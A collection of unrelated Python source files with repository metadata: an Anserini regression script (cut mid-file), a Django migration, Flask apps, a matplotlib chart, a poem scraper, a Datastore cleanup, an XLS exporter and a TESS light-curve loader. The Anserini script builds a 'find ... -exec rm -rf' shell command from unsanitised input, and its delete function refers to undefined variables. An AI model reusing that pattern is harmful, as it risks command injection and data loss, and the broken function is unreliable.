if not os.path.exists(this_output_root):
os.makedirs(this_output_root)
logger.info('='*10+'Batch Retrieval Parameters Generated'+'='*10)
for topic in collection_yaml['topics']:
model_params = Search(index_path).gen_batch_retrieval_params(topic['path'], models_yaml, this_output_root)
for para in model_params:
this_para = (
program,
'-searchtweets' if 'mb' in collection_yaml['name'] else '',
'-topicreader', collection_yaml['topic_reader'],
'-index', index_path,
'-topics', os.path.join(collection_yaml['anserini_root'], collection_yaml['topic_root'], topic['path']),
para[0],
'-output', para[1]
)
all_params.append(this_para)
logger.info('='*10+'Starting Batch Retrieval'+'='*10)
batch_everything(all_params, atom_retrieval)
def atom_retrieval(para):
subprocess.call(' '.join(para), shell=True)
def batch_eval(collection_yaml, models_yaml, output_root):
all_params = []
index_path = get_index_path(collection_yaml)
programs = set([eval['command'] for eval in collection_yaml['evals']])
this_output_root = os.path.join(output_root, collection_yaml['name'])
if not os.path.exists(this_output_root):
os.makedirs(this_output_root)
eval_params = Evaluation(index_path).gen_batch_eval_params(this_output_root)
for para in eval_params:
topic_path, run_file_path, eval_output = para
for topic in collection_yaml['topics']:
if topic['path'] == topic_path:
this_para = (
[os.path.join(collection_yaml['anserini_root'], program) for program in programs],
os.path.join(collection_yaml['anserini_root'], collection_yaml['qrels_root'], topic['qrel']),
run_file_path,
eval_output
)
all_params.append(this_para)
logger.info('='*10+'Starting Batch Evaluation'+'='*10)
batch_everything(all_params, atom_eval)
def atom_eval(params):
Evaluation.output_all_evaluations(*params)
def batch_output_effectiveness(collection_yaml, models_yaml, output_root):
all_params = []
index_path = get_index_path(collection_yaml)
this_output_root = os.path.join(output_root, collection_yaml['name'])
if not os.path.exists(this_output_root):
os.makedirs(this_output_root)
all_params.extend( Effectiveness(index_path).gen_output_effectiveness_params(this_output_root) )
logger.info('='*10+'Starting Output Effectiveness'+'='*10)
batch_everything(all_params, atom_output_effectiveness)
def atom_output_effectiveness(para):
index_path = para[0]
output_fn = para[1]
input_fns = para[2:]
Effectiveness(index_path).output_effectiveness(output_fn, input_fns)
def print_optimal_effectiveness(collection_yaml, models_yaml, output_root, metrics=['map']):
index_path = get_index_path(collection_yaml)
this_output_root = os.path.join(output_root, collection_yaml['name'])
logger.info('='*30+'JDIQ2018 Effectiveness for '+collection_yaml['name']+'='*30)
effectiveness = Effectiveness(index_path).load_optimal_effectiveness(this_output_root, metrics)
success = True
for e in effectiveness:
expected = models_yaml[e['model']]['expected'][collection_yaml['name']][e['metric']][e['topic']]
if isclose(expected, e['actual']):
logger.info(json.dumps(e, sort_keys=True))
else:
success = False
logger.error('!'*5+'expected:%f'%expected+json.dumps(e, sort_keys=True)+'!'*5)
if success:
logger.info("All Tests Passed!")
def del_method_related_files(method_name):
folders = ['split_results', 'merged_results', 'evals', 'effectiveness']
for q in g.query:
collection_name = q['collection']
index_name = c['index']
collection_path = os.path.join(_root, index_name)
for f in folders:
if os.path.exists( os.path.join(collection_path, f) ):
logger.info('Deleting ' + os.path.join(collection_path, f) + ' *' + method_name + '*')
if f == 'split_results' or f == 'merged_results':
subprocess.call('find %s -name "*method:%s*" -exec rm -rf {} \\;' % (os.path.join(collection_path, f), method_name), shell=True)
else:
subprocess.call('find %s -name "*%s*" -exec rm -rf {} \\;' % (os.path.join(collection_path, f), method_name), shell=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# general settings
parser.add_argument('--anserini_root', default='', help='Anserini path')
parser.add_argument('--collection', required=True, help='the collection key in yaml')
parser.add_argument('--n', dest='parallelism', type=int, default=16, help='number of parallel threads for retrieval/eval')
parser.add_argument('--output_root', default='all_results', help='output directory of all results')
# runtime
parser.add_argument(
"--del_method_related_files",
nargs=1,
help="Delete all the output files of a method."
)
parser.add_argument(
"--metrics",
nargs='+',
default=['map'],
help="inputs: [metrics]. For example, --metrics map ndcg20"
)
args = parser.parse_args()
if not os.path.exists(args.output_root):
os.makedirs(args.output_root)
if args.del_method_related_files:
del_method_related_files(args.del_method_related_files[0])
else:
parallelism = args.parallelism
with open(os.path.join(args.anserini_root, 'src/main/resources/regression/{}.yaml'.format(args.collection))) as f:
collection_yaml = yaml.safe_load(f)
with open(os.path.join(args.anserini_root, 'src/main/resources/jdiq2018/models.yaml')) as f:
models_yaml = yaml.safe_load(f)['models']
collection_yaml['anserini_root'] = args.anserini_root
batch_retrieval(collection_yaml, models_yaml, args.output_root)
batch_eval(collection_yaml, models_yaml, args.output_root)
batch_output_effectiveness(collection_yaml, models_yaml, args.output_root)
print_optimal_effectiveness(collection_yaml, models_yaml, args.output_root, args.metrics)
|
[
"[email protected]"
] | |
33312e48a6fec52577cc1a2ee8867f5750e74dfe
|
1f410c8010877a56f4457535197dce856676b20b
|
/src/apps/datasets/migrations/0003_dataset_uuid.py
|
a0dbd6564812f765b4f6083fab8af3ea40c986b9
|
[
"MIT"
] |
permissive
|
ckcollab/brains
|
1484222312b1695081bc77d9d5ca4ee6e8ce7ad8
|
1f85462d3e4f25170b8c487a0ff4efb598bf1f2e
|
refs/heads/master
| 2021-05-30T13:42:30.628334 | 2015-12-30T01:20:11 | 2015-12-30T01:20:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 463 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-18 20:04
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('datasets', '0002_auto_20151217_1928'),
]
operations = [
migrations.AddField(
model_name='dataset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4),
),
]
|
[
"[email protected]"
] | |
aadb205a2439041ce02330affc79dc4f38e71027
|
beffbf1f432b77499cff2e5410268cc1eabc82c3
|
/Backend/belisce.py
|
36f6c60eb1caff86a3a7a97e45ffb8b726de11f3
|
[] |
no_license
|
AlenCamagajevac/LRA
|
dc482207358ae745372d86dad371862e48cc4ed5
|
035b4fd054e9f122b4084b19c5e83daf4b1ca6df
|
refs/heads/master
| 2023-04-26T21:56:49.297027 | 2020-05-19T06:59:26 | 2020-05-19T06:59:26 | 263,342,701 | 0 | 0 | null | 2021-05-11T14:38:29 | 2020-05-12T13:20:35 |
Python
|
UTF-8
|
Python
| false | false | 1,436 |
py
|
import logging
import logging.config
import yaml
from flask import Flask
from flask_migrate import Migrate
from jwt_config import setup_jwt
from resources import blueprint as api_blueprint
from db import db
from core.seed_data.database_seed import DatabaseSeeder
from core.logging.access_log import init_access_logger
from core.metrics.prometheus import metrics
from mail import mail
log = logging.getLogger(__name__)
def create_app():
app = Flask(__name__)
# Load config
if app.config["ENV"] == "production":
app.config.from_object("config.ProductionConfig")
elif app.config["ENV"] == "testing":
app.config.from_object("config.TestingConfig")
else:
app.config.from_object("config.DevelopmentConfig")
# Initialize logs
logging.config.dictConfig(
yaml.load(
open(app.config["LOG_CONFIG_FILE"]), Loader=yaml.FullLoader)
)
init_access_logger(app)
# Register blueprints
app.register_blueprint(api_blueprint, url_prefix='/api')
# Initialize jwt
setup_jwt(app)
# Initialize database
db.init_app(app)
# Initialize migrations
Migrate(app, db)
# Seed database data
seeder = DatabaseSeeder()
seeder.init_app(app)
# Initialize metrics
try:
metrics.init_app(app)
except ValueError:
log.info('Metrics already initialized')
# Initialize mail
mail.init_app(app)
return app
|
[
"[email protected]"
] | |
b96e02dead305da09846744075aa26794afff58c
|
8b75c16b18adaeccd58d0f933e64d6521d90697e
|
/matplotlib_stu/lesson_02.py
|
28c00e940c457855dccd58ad3bac1aced8c20dff
|
[] |
no_license
|
elliottqian/ML_STUDY_P27_GIT
|
21a16bee9d6b9747e5743dc25cd174e046b6f0ce
|
38e2afab079ccc6acfe93adffbbebc2930d169a7
|
refs/heads/master
| 2021-01-20T21:12:48.794327 | 2017-01-08T16:24:12 | 2017-01-08T16:24:12 | 62,136,714 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 722 |
py
|
import numpy as np
import matplotlib.pyplot as plt
n_groups = 5
means_men = (20, 19, 18, 17, 16)
means_women = (25, 32, 34, 20, 25)
fig, ax = plt.subplots()
index = np.arange(n_groups)
# bar width
bar_width = 0.1
opacity = 0.4
# The arguments are, in order:
# x positions, values at each position, bar width, opacity, color, legend label
rects1 = plt.bar(index, means_men, bar_width, alpha=opacity, color='b', label='Men')
rects2 = plt.bar(index + bar_width, means_women, bar_width, alpha=opacity, color='r', label='Women')
plt.xlabel('Group')
plt.ylabel('Scores')
plt.title('Scores by group and gender')
# position of the x-axis tick labels
plt.xticks(index + bar_width, ('A', 'B', 'C', 'D', 'E'))
plt.ylim(0, 40)
plt.legend()
plt.tight_layout()
plt.show()
|
[
"[email protected]"
] | |
84bfdcb2572f73b8a3127ae075b64188d0f455ad
|
2dd2c41e65cbb8d915d01c40ed1c68c4e923e98b
|
/venv/Lib/site-packages/tablip/formats/_xls.py
|
b631f3994a0dd768a96fb5cfd090acfb9f6f36a3
|
[] |
no_license
|
tyagisen/Ecommerce
|
aca312c0116175058de35453d30dcc8cb2496bce
|
bc6a1cc07f5416a46fa0c3a03b6b91bf1b8508f8
|
refs/heads/master
| 2023-08-15T22:45:33.339529 | 2021-09-23T13:56:31 | 2021-09-23T13:56:31 | 409,611,051 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,937 |
py
|
""" Tablib - XLS Support.
"""
from io import BytesIO
import tablip
import xlrd
import xlwt
# special styles
wrap = xlwt.easyxf("alignment: wrap on")
bold = xlwt.easyxf("font: bold on")
class XLSFormat:
title = 'xls'
extensions = ('xls',)
@classmethod
def detect(cls, stream):
"""Returns True if given stream is a readable excel file."""
try:
xlrd.open_workbook(file_contents=stream)
return True
except Exception:
pass
try:
xlrd.open_workbook(file_contents=stream.read())
return True
except Exception:
pass
try:
xlrd.open_workbook(filename=stream)
return True
except Exception:
return False
@classmethod
def export_set(cls, dataset):
"""Returns XLS representation of Dataset."""
        wb = xlwt.Workbook(encoding='utf8')  # create a workbook (one file) with xlwt
        ws = wb.add_sheet(dataset.title if dataset.title else 'Tablib Dataset')  # add a sheet named after the dataset title
        cls.dset_sheet(dataset, ws)  # write the dataset contents into the sheet
stream = BytesIO()
wb.save(stream)
return stream.getvalue()
@classmethod
def export_book(cls, databook):
"""Returns XLS representation of DataBook."""
wb = xlwt.Workbook(encoding='utf8')
for i, dset in enumerate(databook._datasets):
ws = wb.add_sheet(dset.title if dset.title else 'Sheet%s' % (i))
cls.dset_sheet(dset, ws)
stream = BytesIO()
wb.save(stream)
return stream.getvalue()
@classmethod
def import_set(cls, dset, in_stream, headers=True):
"""Returns databook from XLS stream."""
dset.wipe()
xls_book = xlrd.open_workbook(file_contents=in_stream.read())
sheet = xls_book.sheet_by_index(0)
dset.title = sheet.name
for i in range(sheet.nrows):
if i == 0 and headers:
dset.headers = sheet.row_values(0)
else:
dset.append([
val if typ != xlrd.XL_CELL_ERROR else xlrd.error_text_from_code[val]
for val, typ in zip(sheet.row_values(i), sheet.row_types(i))
])
@classmethod
def import_book(cls, dbook, in_stream, headers=True):
"""Returns databook from XLS stream."""
dbook.wipe()
xls_book = xlrd.open_workbook(file_contents=in_stream)
for sheet in xls_book.sheets():
data = tablip.Dataset()
data.title = sheet.name
for i in range(sheet.nrows):
if i == 0 and headers:
data.headers = sheet.row_values(0)
else:
data.append(sheet.row_values(i))
dbook.add_sheet(data)
@classmethod
def get_col_width(cls,data):
row_length = 100 if len(data)>100 else len(data)
col_length = 20 if len(data[0])>20 else len(data[0])
col_width = {}
for n in range(col_length):
a = 0
for m in range(row_length):
content = data[m][n]
                if content is not None and content != '' and len(str(content)) > a:  # if the cell at row m, column n is longer than the current maximum, keep its length
a = len(str(content))
col_width[n] = a
return col_width
@classmethod
def dset_sheet(cls, dataset, ws):
"""Completes given worksheet from given Dataset."""
        _package = dataset._package(dicts=False)  # convert the whole dataset into a list with one item per row
col_width = cls.get_col_width(_package)
for i, sep in enumerate(dataset._separators):
_offset = i
_package.insert((sep[0] + _offset), (sep[1],))
for i, row in enumerate(_package):
for j, col in enumerate(row):
                # bold headers: if this is the first row and the dataset has headers, write the header row
                if (i == 0) and dataset.headers:
                    ws.col(j).width = (col_width[j]+3) * 256  # column width = 256 * character count, plus 3 extra characters so the text displays fully
                    ws.write(i, j, col, bold)  # row | column | value | style
# frozen header row
ws.panes_frozen = True
ws.horz_split_pos = 1
# bold separators
elif len(row) < dataset.width:
ws.write(i, j, col, bold)
# wrap the rest
else:
try:
if '\n' in col:
ws.write(i, j, col, wrap)
else:
ws.write(i, j, col)
except TypeError:
ws.write(i, j, col)
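# Illustrative sketch (not part of the original module): a minimal round trip
# through XLSFormat, assuming `tablip` mirrors the familiar tablib Dataset API
# (title / headers / append) that the methods above already rely on.
def _example_xls_roundtrip():
    data = tablip.Dataset()
    data.title = 'People'
    data.headers = ['name', 'age']
    data.append(['Ada', 36])
    data.append(['Alan', 41])
    xls_bytes = XLSFormat.export_set(data)  # bytes of a .xls workbook
    imported = tablip.Dataset()
    XLSFormat.import_set(imported, BytesIO(xls_bytes))
    return imported.headers  # ['name', 'age']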
|
[
"[email protected]"
] | |
f1e8216fde2ab8e09e1501fb7af1c8b7efa1794f
|
fe25c062e41678a45a9560a372172d089c3acccd
|
/_lab-work/lab13/task5/main.py
|
a0823363f6f819223297947ebc5b1c4d8dee4cd0
|
[] |
no_license
|
linuk/food-serve-delicious
|
bd200ad33fc2b65177535dd71499ec011d01e275
|
95245d5a6f5922ff976d6bfedce0ceffb96fc4f5
|
refs/heads/master
| 2020-03-15T14:47:59.326180 | 2018-05-04T23:31:00 | 2018-05-04T23:31:00 | 132,197,477 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,990 |
py
|
from flask import Flask, render_template, flash, send_from_directory
import os
from werkzeug.utils import secure_filename
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'static/uploads'
app.secret_key = "asdhiqwekhukh2397y1238oyt786atp0-vy9awer"
ALLOW_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif']
class UploadForm(FlaskForm):
""" Construct the upload form """
upload = FileField("image", validators=[FileAllowed(ALLOW_EXTENSIONS,
'Please upload image files: the extension should be "{}".'
.format(ALLOW_EXTENSIONS)), FileRequired()])
# list uploaded files and upload form
@app.route('/', methods=['GET', 'POST'])
def main():
error = None
    form = UploadForm()
if form.validate_on_submit():
# get a secure file name, such as removing the space and adding underscore
file = form.upload.data
filename = secure_filename(file.filename)
# save the file to the upload folder
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
flash('Image "{}" is uploaded.'.format(file.filename))
# retrieve the files and validate the file extension at the same time
files = [os.path.join(app.config['UPLOAD_FOLDER'], f) for f in os.listdir(app.config['UPLOAD_FOLDER']) if
validate_filename(f)]
return render_template('main.html', form=form, files=files, error=error)
# download file
@app.route('/download/<filename>')
def download(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
# Private methods
def validate_filename(filename):
validateDot = '.' in filename
    validateExt = filename.rsplit('.', 1)[-1].lower() in ALLOW_EXTENSIONS  # use the last dot-separated part so names like "my.photo.jpg" validate correctly
return validateDot and validateExt
if __name__ == '__main__':
app.run(host='0.0.0.0', port=4000, debug=True)
|
[
"[email protected]"
] | |
9fd8a6e45d473d3e878fe000db8eb996be0c59a3
|
635c79ae11f9ac29aa1917a3792b8195c6689ec3
|
/1_Python/Desafios/036_Empréstimo_casa.py
|
3232e4198848bde2cb5c02452b63912258f11e67
|
[
"MIT"
] |
permissive
|
guilhermebaos/Curso-em-Video-Python
|
822d3a43235f75637f5698aa5d071e7bf96262ec
|
b72c98aac74824813e96932def07b9449b74dd14
|
refs/heads/master
| 2022-02-26T00:35:58.548167 | 2022-02-05T13:17:04 | 2022-02-05T13:17:04 | 254,331,576 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 579 |
py
|
from termcolor import colored, cprint
cprint('Sistema de aprovamento de empréstimos automático', 'yellow')
c = float(input(colored('Qual é o valor da casa que quer comprar?(€) ', 'blue')))
s = float(input(colored('Qual é o seu salário?(€) ', 'blue')))
a = float(input(colored('Em quantos anos pretende pagar a casa? ', 'blue')))
m = a * 12
men = c / m
sd = s * 0.3
if sd > men:
cprint('O seu empréstimo foi aprovado!', 'green')
cprint('A sua prestação mensal será de {:.2f}€'.format(men), 'green')
else:
cprint('O seu empréstimo foi negado.', 'red')
|
[
"[email protected]"
] | |
c76818ac251baba4d8e9c25bf8d51d65511fec87
|
3df392ab9726687b71ba721f5ccb7e87e68152f5
|
/src/python/cloud_functions/clear_shelves.py
|
bc764e1f15f3e819b6643b61898511f5c99e178e
|
[] |
no_license
|
djmarcus/OrderingDelivery
|
f68573420c0844dba6eec846f3cfe6fccba00716
|
5050e35f19ba334d7e350d08a80a926b535232f3
|
refs/heads/master
| 2022-04-26T11:13:51.906701 | 2020-04-09T18:52:51 | 2020-04-09T18:52:51 | 197,234,216 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 689 |
py
|
from google.cloud import datastore
datastore_client = datastore.Client()
def clear_shelves():
    # Delete every entity of each shelf kind; same behaviour as the original
    # copy-pasted blocks, just expressed as a single loop.
    for kind in ("overflow", "cold", "frozen", "hot"):
        query = datastore_client.query(kind=kind)
        results = list(query.fetch())
        for result in results:
            datastore_client.delete(result.key)
clear_shelves()
|
[
"[email protected]"
] | |
36457a95f13f7e83e99c40acfe8b170b4504153e
|
6528707b55bcf417bab35fba59c956a704c524ad
|
/examples/threaded.py
|
98edb80fdfd6c339c2e6eaf4f27e3b910ba25655
|
[] |
no_license
|
badisa/bs-abqpy-example
|
e0231bb55c0254e3d630ba7cb1dcce993d93c89b
|
bc955baf93bf422c8ae4a4662c051fb537dfaf7a
|
refs/heads/master
| 2016-08-03T23:48:11.318895 | 2015-06-03T01:16:43 | 2015-06-03T01:16:43 | 35,226,206 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,784 |
py
|
import threading
import urllib
import time
from bs4 import BeautifulSoup
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'number',
type=int,
help='Number of Poems to Scrape')
parser.add_argument(
'count',
type=int,
help='Number of Loops in Each Thread',
default=0)
args = parser.parse_args()
poemSem = threading.Semaphore()
poemSem.poems = []
class GetTopPoem(threading.Thread):
'''
Threaded Variant of Poem Web Scraping
'''
def __init__(self, start, incr, count):
'''Initialize the Thread'''
threading.Thread.__init__(self)
self.INITIAL = start
self.INCREMENT = incr
self.COUNT = count
def run(self):
global poemSem
base_url = 'http://hellopoetry.com'
page = urllib.urlopen(base_url).read()
soup = BeautifulSoup(page)
poems = soup.find_all('div', class_='poem')
for x in xrange(self.INITIAL, (self.INCREMENT * self.COUNT), self.INCREMENT):
poem_page = poems[x].get('data-url')
poem_page = urllib.urlopen(poem_page).read()
poetry_soup = BeautifulSoup(poem_page)
poem = poetry_soup.find('div', class_='poem')
for br in poem.find_all('br'):
br.append('\n')
br.unwrap()
title = poem.get('data-text')
body = poem.p.extract().prettify()
poemSem.poems.append([title, body])
def main(num, count):
num = num / count
thread_list = []
for i in xrange(num):
thread = GetTopPoem(i, num, count)
thread.start()
thread_list.append(thread)
for thread in thread_list:
thread.join()
print poemSem.poems, len(poemSem.poems)
main(args.number, args.count)
|
[
"[email protected]"
] | |
11f394999f596ffed484585977fc5206096d8378
|
33b00fadfa2e56e5a628e1905411088fa7ecac8d
|
/pipeline.py
|
502c2762e25f273b5c4d02600df766cba02b452a
|
[] |
no_license
|
burke86/tequila_shots_binder
|
82c43accc48e6ea34022de481248f0eb8b6dfb23
|
30b480b013f5c920e269183ffc3e1cfe69980889
|
refs/heads/master
| 2022-11-06T14:07:00.220271 | 2020-06-25T10:47:43 | 2020-06-25T10:47:43 | 274,830,222 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,961 |
py
|
import numpy as np
import sys, os
import warnings
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import lightkurve as lk
from lightkurve import MPLSTYLE
from astropy import units as u
from astropy.table import unique
from astropy.table import QTable
from astropy.coordinates import SkyCoord
from astropy.wcs.utils import pixel_to_skycoord
import astropy.io.fits as fits
plt.style.use(MPLSTYLE)
def load(coord, diffim=False,
out_dir=os.path.join(os.path.expanduser('~'),'tequila_shots/output')):
"""
Load tequila_shots output file for previous pipeline run.
WARNING: This code is not fully validated!
Args:
coord (SkyCoord): Astropy SkyCoord of target
(REQUIRED)
diffim (bool): Load difference imaging?
(default is False)
out_dir (str): Work directory path
(default is '~/tequila_shots/output')
Returns:
out_dict: Output dictionary
Use `out_dict.keys()` to get keywords.
"""
# Get coordinate name
coord_name = 'J{0}{1}'.format(coord.ra.to_string(unit=u.hourangle, sep='', precision=2, pad=True),
coord.dec.to_string(sep='', precision=2, alwayssign=True, pad=True))
# Get the directory of the target
coord_dir = os.path.join(out_dir, coord_name)
if not os.path.exists(coord_dir):
print('Coord directory does not exist!')
return None
print('Files in object directory %s:' % coord_dir)
f_list = os.listdir(coord_dir)
if len(f_list) == 0:
print('Coord directory is empty!')
return None
[print(f) for f in f_list]
#TODO/WARNING: sort by sector!!
print('WARNING: Sectors may be jumbled!!')
f_list = [os.path.join(coord_dir,f) for f in f_list]
# Plot image and get TPFs
out_dict = {}
out_dict['lc_target'] = [] # Target light curve array of all sectors
out_dict['lc_target_bkg'] = [] # background light curve array
out_dict['lc_star'] = [] # Star light curve array of all sectors
out_dict['aper_target_list'] = [] # List of target apertures files for each sector
out_dict['aper_star_list'] = [] # List of star apertures files for each sector
out_dict['ref_flux_list'] = [] # List of target pixel files for each sector
out_dict['tpf_list'] = [] # List of target pixel files for each sector
out_dict['tpf_diff_list'] = [] # List of difference target pixel files for each sector
out_dict['coord_dir'] = coord_dir # Target output directory
out_dict['wcs_ref'] = [] # Reference WCS
# Populate dict
for f in f_list:
if '_panel_' in f:
img = mpimg.imread(f)
imgplot = plt.imshow(img)
plt.gca().axis('off')
plt.tight_layout()
plt.show()
elif 'ref_flux_' in f:
out_dict['ref_flux_list'].append(fits.open(f)[0].data)
elif 'lc_target_bkg_' in f:
out_dict['lc_target_bkg'].append(lk.lightcurvefile.LightCurveFile(f))
elif 'lc_target_' in f:
out_dict['lc_target'].append(lk.lightcurvefile.LightCurveFile(f))
elif 'lc_star_' in f:
out_dict['lc_star'].append(lk.lightcurvefile.LightCurveFile(f))
# Load TPFs
if diffim:
if 'tpf_diff_' in f:
tpf = lk.TessTargetPixelFile(f)
out_dict['tpf_list'].append(tpf)
if out_dict['wcs_ref'] == []:
out_dict['wcs_ref'] = tpf.wcs
elif 'tpfdiff_' in f:
tpf = lk.TessTargetPixelFile(f)
out_dict['tpf_diff_list'].append(tpf)
else:
if 'tpf_' in f:
tpf = lk.TessTargetPixelFile(f)
out_dict['tpf_list'].append(tpf)
if out_dict['wcs_ref'] == []:
out_dict['wcs_ref'] = tpf.wcs
print('Done loading.')
return out_dict
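# Illustrative usage sketch (not part of the original module): the coordinates
# below are arbitrary placeholders, and out_dir falls back to the default
# '~/tequila_shots/output' assumed by load().
if __name__ == '__main__':
    target = SkyCoord(ra=150.0 * u.deg, dec=2.2 * u.deg)  # hypothetical target
    result = load(target, diffim=False)
    if result is not None:
        print('Sectors loaded:', len(result['tpf_list']))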
|
[
"[email protected]"
] | |
e642eca3839f51f6a0934e2a47c2bbfce1e4c387
|
1c774c129385b4bd6006ef61f53e75d07474d03e
|
/base_for_web_app.py
|
000df6aa26904997f99cac20037aa0971f39c861
|
[] |
no_license
|
darth-mycol/slot-wiz
|
4de6388c5c754ccdd1159f8623543d12c9b38d08
|
d21f214c7366c41d4a580bfb6d395c2876469ac9
|
refs/heads/master
| 2021-01-13T17:32:07.158550 | 2017-02-23T17:59:37 | 2017-02-23T17:59:37 | 81,810,073 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,522 |
py
|
from flask import Flask, jsonify, render_template, request
import data_interaction_module_aiims
import data_interaction_module_slotting
import slot_distribution_calculator
import slot_schedule_payoff_calculator
app = Flask(__name__)
@app.route('/_by_date')
def by_date_look_up():
try:
date = request.args.get('date', 0, type=str)
capacity = request.args.get('capacity', 0, type=int)
department = request.args.get('department', 0, type=int)
optimal_n, prob_range = data_interaction_module_aiims.retrieve_values_by_date(date, department, capacity)
if optimal_n is None:
return jsonify(success="false", result="Data Not Previously Calculated",
prob_range="Data Not Previously Calculated")
return jsonify(success="true", result=optimal_n, prob_range=round(float(prob_range), 2))
except Exception:
return jsonify(success="false", result="Internal Error - Please check parameters",
prob_range="Internal Error - Please check parameters")
@app.route('/_add_numbers')
def add_numbers():
try:
prob = request.args.get('probability', 0, type=float)
capacity = request.args.get('capacity', 0, type=int)
optimal_n, prob_range = data_interaction_module_aiims.retrieve_values(prob, capacity)
if optimal_n is None:
return jsonify(success="false",
result="Data Not Previously Calculated. Calculated probability range - 0.1 to 0.99, both inclusive, with a step of 0.01",
prob_range="Data Not Previously Calculated")
return jsonify(success="true", result=optimal_n, prob_range=round(float(prob_range), 2))
except Exception:
return jsonify(success="false", result="Internal Error. Please check parameters.",
prob_range="Internal Error. Please check parameters.")
@app.route('/_add_date_data')
def by_date():
try:
date = request.args.get('date', 0, type=str)
department = request.args.get("department", 0, type=str)
booked = request.args.get("daybooked", 0, type=str)
show_up = request.args.get("dayshowup", 0, type=str)
data_interaction_module_aiims.save_values_by_date(date, department, booked, show_up)
return jsonify(success="true")
except Exception:
return jsonify(success="false")
@app.route('/_lookup_optimal_slotting_schedule')
def lookup_optimal_slotting_schedule():
try:
prob = request.args.get('probability', 0, type=float)
total_capacity = request.args.get('total_capacity', 0, type=int)
over_time_constant = request.args.get('over_time_constant', 1, type=float)
wait_time_constant = request.args.get('wait_time_constant', 1, type=float)
over_time_power = request.args.get('over_time_power', 2, type=float)
schedule, pay_off = data_interaction_module_slotting.look_up_dictionary(prob, 3, total_capacity,
over_time_constant, wait_time_constant,
over_time_power)
if schedule is None or len(schedule) == 0:
return jsonify(success="false", result="Optimal Value not previously calculated",
prob_range="Optimal Value not previously calculated")
return jsonify(success="true", result=', '.join(map(str, schedule)), prob_range=round(float(pay_off), 2))
except Exception:
return jsonify(success="false", result="Internal Error. Please check parameters.",
prob_range="Internal Error. Please check parameters.")
@app.route('/_calculate_payoff')
def calculate_payoff():
try:
number_of_slots = request.args.get('number_of_slots', 3, type=int)
input_schedule = request.args.get('schedule', 2, type=str)
schedule = []
for term in input_schedule.split(","):
if term.strip() == "":
continue
schedule.append(int(term.strip()))
if len(schedule) != number_of_slots:
return jsonify(success="false", result="No of Slots in Schedule not equal to total number of slots.")
if number_of_slots < 1:
return jsonify(success="false", result="No of Slots cannot be less than 1")
prob = request.args.get('probability', 0, type=float)
total_capacity = request.args.get('total_capacity', 0, type=int)
over_time_constant = request.args.get('over_time_constant', 1, type=float)
wait_time_constant = request.args.get('wait_time_constant', 1, type=float)
over_time_power = request.args.get('over_time_power', 2, type=float)
per_slot_processing_list = \
slot_distribution_calculator.get_initial_configuration(number_of_slots, total_capacity)
pay_off = slot_schedule_payoff_calculator.estimate_payoff(schedule, prob, per_slot_processing_list,
over_time_constant, wait_time_constant,
over_time_power)
return jsonify(success="true", result=round(float(pay_off), 2))
except Exception:
return jsonify(success="false", result="Internal Error. Please check parameters.")
@app.route('/')
def index():
return render_template('index.html')
if __name__ == '__main__':
app.run()
|
[
"[email protected]"
] | |
07bafbf54361a1f49f8246f063abe7ea2f4ac270
|
386448448c23d0e4f6b72d37f7ca20caa1ecc207
|
/part 09 增加子弹/settings.py
|
93d23f33f61f96182c92c5aae5d24b66cb55ca40
|
[] |
no_license
|
typeme/pygame-demo
|
1299bd1b437f52234cf1c48a4ee3265811bbf4a5
|
875fabec70ae7aaa245f7fc1c35f2dee173df58e
|
refs/heads/master
| 2020-05-28T09:38:54.475818 | 2019-07-01T15:00:33 | 2019-07-01T15:00:33 | 188,958,624 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,014 |
py
|
import pygame as pg
vec = pg.math.Vector2
# define some colors (R, G, B)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
DARKGREY = (40, 40, 40)
LIGHTGREY = (100, 100, 100)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
BROWN = (106, 55, 5)
# basic game settings
WIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16
HEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12
FPS = 60  # frame rate
TITLE = "part 09 Demo"
BGCOLOR = BROWN  # background color
TILESIZE = 64  # size of each grid tile
GRIDWIDTH = WIDTH / TILESIZE  # number of tiles per row
GRIDHEIGHT = HEIGHT / TILESIZE  # number of tiles per column
WALL_IMG = 'tileGreen_39.png'
# Player settings
PLAYER_SPEED = 300.0
PLAYER_ROT_SPEED = 250.0
PLAYER_IMG = 'manBlue_gun.png'
PLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)
BARREL_OFFSET = vec(30, 10)
# Gun settings
BULLET_IMG = 'bullet.png'
BULLET_SPEED = 500
BULLET_LIFETIME = 1000
BULLET_RATE = 150
KICKBACK = 200
GUN_SPREAD = 5
# Mob settings
MOB_IMG = 'zombie1_hold.png'
MOB_SPEED = 150
MOB_HIT_RECT = pg.Rect(0, 0, 35, 35)
|
[
"[email protected]"
] | |
339e645241a59e0357edfc8df83ee28aea3818c3
|
2e811dbe3b5e08733416d2aae1d63e32d0d8b079
|
/word_cloud.py
|
10be404d6a780e949df5bcd1b039218fe5762136
|
[] |
no_license
|
tengbing88/The_Captain
|
1f40b23ac04bcb3fbca6041cc70b8e8449004623
|
72f8b76d89dc60d961afbb4e6b5f27b3d36dee3c
|
refs/heads/master
